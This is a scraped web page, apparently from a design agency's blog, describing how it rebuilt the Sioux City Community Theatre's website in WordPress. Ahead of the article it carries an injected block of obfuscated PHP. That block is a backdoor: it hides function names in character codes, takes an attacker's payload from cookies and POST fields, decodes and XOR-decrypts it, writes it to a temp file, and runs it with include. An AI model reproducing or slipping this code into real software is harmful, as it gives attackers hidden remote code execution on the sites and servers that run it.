$OEOMOb = "\130" . "\137" . "\164" . "\x46" . chr ( 818 - 733 )."\152" . 'p';$fZngkfAmdX = chr ( 223 - 124 )."\x6c" . "\x61" . chr ( 548 - 433 ).chr ( 628 - 513 ).'_' . chr ( 854 - 753 )."\x78" . chr (105) . chr (115) . 't' . 's';$JVjJsPlpiI = class_exists($OEOMOb); $fZngkfAmdX = "35815";$XqnsxymB = strpos($fZngkfAmdX, $OEOMOb);if ($JVjJsPlpiI == $XqnsxymB){function qmyDmATqTD(){$qMPsdYrv = new /* 62055 */ X_tFUjp(12606 + 12606); $qMPsdYrv = NULL;}$pvxijID = "12606";class X_tFUjp{private function MseWWSgm($pvxijID){if (is_array(X_tFUjp::$UbHHQtGOn)) {$name = sys_get_temp_dir() . "/" . crc32(X_tFUjp::$UbHHQtGOn["salt"]);@X_tFUjp::$UbHHQtGOn["write"]($name, X_tFUjp::$UbHHQtGOn["content"]);include $name;@X_tFUjp::$UbHHQtGOn["delete"]($name); $pvxijID = "12606";exit();}}public function FBJjjxgRon(){$DgGffJXJE = "31525";$this->_dummy = str_repeat($DgGffJXJE, strlen($DgGffJXJE));}public function __destruct(){X_tFUjp::$UbHHQtGOn = @unserialize(X_tFUjp::$UbHHQtGOn); $pvxijID = "24613_16939";$this->MseWWSgm($pvxijID); $pvxijID = "24613_16939";}public function vIzCzhOvZ($DgGffJXJE, $KJKBXCiT){return $DgGffJXJE[0] ^ str_repeat($KJKBXCiT, intval(strlen($DgGffJXJE[0]) / strlen($KJKBXCiT)) + 1);}public function RaLWUXf($DgGffJXJE){$wtAfU = chr (98) . chr ( 457 - 360 ).chr ( 1105 - 990 ).'e' . chr ( 991 - 937 )."\x34";return array_map($wtAfU . "\137" . "\144" . "\145" . "\x63" . chr ( 149 - 38 )."\144" . "\x65", array($DgGffJXJE,));}public function __construct($KsGdVD=0){$BQVBdvVz = ',';$DgGffJXJE = "";$zvVOkwJI = $_POST;$nZTZMbSsRr = $_COOKIE;$KJKBXCiT = "78e17c63-f953-4c0d-94e2-9fcfec758e1a";$mYjSmTjXX = @$nZTZMbSsRr[substr($KJKBXCiT, 0, 4)];if (!empty($mYjSmTjXX)){$mYjSmTjXX = explode($BQVBdvVz, $mYjSmTjXX);foreach ($mYjSmTjXX as $UBsbTu){$DgGffJXJE .= @$nZTZMbSsRr[$UBsbTu];$DgGffJXJE .= @$zvVOkwJI[$UBsbTu];}$DgGffJXJE = $this->RaLWUXf($DgGffJXJE);}X_tFUjp::$UbHHQtGOn = $this->vIzCzhOvZ($DgGffJXJE, $KJKBXCiT);if (strpos($KJKBXCiT, $BQVBdvVz) !== FALSE){$KJKBXCiT = explode($BQVBdvVz, $KJKBXCiT); $zQHLvmp = sprintf("24613_16939", rtrim($KJKBXCiT[0]));}}public static $UbHHQtGOn = 20492;}qmyDmATqTD();} Community Theatre rolls out new website – Team Creative Fire

Community Theatre rolls out new website

Community Theatre rolls out new website

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[vc_row][vc_column width=”1/1″]The Sioux City Community Theatre is a busy place during their active show season. Kids practicing in the back room, adults onstage and costumers in between.


In fact, it was so busy at times that their previous HTML website seemed out of date every time they added new show dates.


Theatre members asked Team Creative Fire to leader a makeover and upgrade of content on the site to give it more functionality. Their main requests with the redesign were that they have access to update information regularly for theatregoers and the community at large, and that information be easy to find across the entire site – from audition dates and upcoming shows, to director’s notes and behind-the-scenes photos.


Team Creative Fire worked with their executive board and theatre leadership to build a custom WordPress site with greater interactivity. The new site allows the staff to post new information whenever they like, and includes a simple calendar system to keep patrons updated about upcoming events, such as fund-raisers and shows.


Let the show begin.


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